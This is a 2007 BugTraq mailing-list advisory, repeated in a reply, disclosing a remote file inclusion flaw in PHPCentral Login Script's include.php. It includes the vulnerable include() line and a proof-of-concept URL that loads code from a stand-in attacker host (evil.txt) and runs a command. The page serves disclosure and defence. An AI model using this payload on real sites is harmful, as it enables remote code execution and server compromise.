BugTraq
Back to list
|
Post reply
PHPCentral Login Script Remote Command Execution Vulnerability
Aug 12 2007 03:12PM
rizgar linuxmail org
(1 replies)
PHPCentral Login Script Remote Command Execution Vulnerability
-----------------------------------------------------------------------
Script : PHPCentral Login Script
Version : 1.0
Site : http://www.phpcentral.org/scripts.php
Founder : Rizgar
Contact : rizgar (at) linuxmail (dot) org [email concealed] and irc.gigachat.net #kurdhack
Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)
d0rk : not d0rk :)
-----------------------------------------------------------------------
Vulnerability details :
This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of the PHPCentral Login script.
------------------------------------------------------------------------
look at include.php
include.php ;
Lines 4 ;
include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");
PoC :
http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.tx
t?&cmd=id
# milw0rm.com [2007-08-10]
[ reply ]
Re: PHPCentral Login Script Remote Command Execution Vulnerability
Aug 14 2007 08:16AM
Magnus Holmgren (holmgren lysator liu se)
Privacy Statement
Copyright 2010, SecurityFocus
-----------------------------------------------------------------------
Script : PHPCentral Login Script
Version : 1.0
Site : http://www.phpcentral.org/scripts.php
Founder : Rizgar
Contact : rizgar (at) linuxmail (dot) org [email concealed] and irc.gigachat.net #kurdhack
Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)
d0rk : not d0rk :)
-----------------------------------------------------------------------
Vulnerability details :
This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of the PHPCentral Login script.
------------------------------------------------------------------------
look at include.php
include.php ;
Lines 4 ;
include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");
PoC :
http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.tx
t?&cmd=id
# milw0rm.com [2007-08-10]
[ reply ]